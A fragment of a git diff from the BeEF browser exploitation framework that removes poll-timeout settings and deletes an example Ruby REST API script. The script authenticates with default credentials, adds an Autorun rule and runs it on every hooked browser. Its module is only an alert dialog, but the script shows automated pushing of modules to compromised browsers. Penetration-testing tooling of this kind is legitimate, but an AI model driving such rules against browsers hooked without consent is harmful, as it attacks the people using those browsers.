chain_mode type is nested-forward, needed as command results are checked via setInterval - # to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually - # continue execution regardless of results. - # If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout. - result_poll_interval: 300 - result_poll_timeout: 5000 - - # If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain. - # This is useful to call modules (nested-forward chain mode) that are not returning their status/results. - continue_after_timeout: true - # Enables DNS lookups on zombie IP addresses dns_hostname_lookup: false diff --git a/tools/rest_api_examples/autorun b/tools/rest_api_examples/autorun deleted file mode 100644 index d38b96b5f7..0000000000 --- a/tools/rest_api_examples/autorun +++ /dev/null @@ -1,102 +0,0 @@ -#!/usr/bin/env ruby -# browser-details - Example BeEF RESTful API script -# Retrieves all Autorun rules, adds a rule, runs it on all online browsers, then deletes it -# Refer to the wiki for info: https://github.com/beefproject/beef/wiki/BeEF-RESTful-API -## -require 'rest-client' -require 'json' -require 'optparse' -require 'pp' -require './lib/string' # colored strings -require './lib/print' # print wrappers -require './lib/beef_rest_api' - -if ARGV.length == 0 - puts "#{$0}:" - puts "| Example BeEF RESTful API script" - puts "| Use --help for help" - puts "|_ Use verbose mode (-v) and debug mode (-d) for more output" - exit 1 -end - -# API config -proto = 'http' -host = '127.0.0.1' -port = '3000' -user = 'beef' -pass = 'beef' - -# Command line options -@debug = false -@verbose = false -OptionParser.new do |opts| - opts.on('-h', '--help', 'Shows this help screen') do - puts opts - exit 1 - end - opts.on('--host HOST', "Set BeEF host (default: #{host})") do |h| - host = h - end - opts.on('--port PORT', "Set BeEF port (default: #{port})") do |p| - port = p - end - opts.on('--user USERNAME', "Set BeEF username (default: #{user})") do |u| - user = u - end - opts.on('--pass PASSWORD', "Set BeEF password (default: #{pass})") do |p| - pass = p - end - opts.on('--ssl', 'Use HTTPS') do - proto = 'https' - end - opts.on('-v', '--verbose', 'Enable verbose output') do - @verbose = true - end - opts.on('-d', '--debug', 'Enable debug output') do - @debug = true - end -end.parse! - -@api = BeefRestAPI.new proto, host, port, user, pass - -# Retrieve the RESTful API token -print_status "Authenticating to: #{proto}://#{host}:#{port}" -@api.auth - -# Retrieve BeEF version -@api.version - -print_status("Retrieving Autorun rules") -rules = @api.autorun_rules -print_debug(rules) - -print_status("Adding a rule") - -res = @api.autorun_add_rule({ - "name": "Say Hello", - "author": "REST API", - "modules": [ - { - "name": "alert_dialog", - "options": { - "text":"Hello from REST API" - } - } - ], - "execution_order": [0], - "execution_delay": [0] -}) - -print_debug(res) - -rule_id = res['rule_id'] - -unless rule_id.nil? - print_status "Running rule #{rule_id} on all browsers" - res = @api.autorun_run_rule_on_all_browsers(rule_id) - print_debug(res) - - print_status("Deleting rule #{rule_id}") - res = @api.autorun_delete_rule(rule_id) - print_debug(res) -end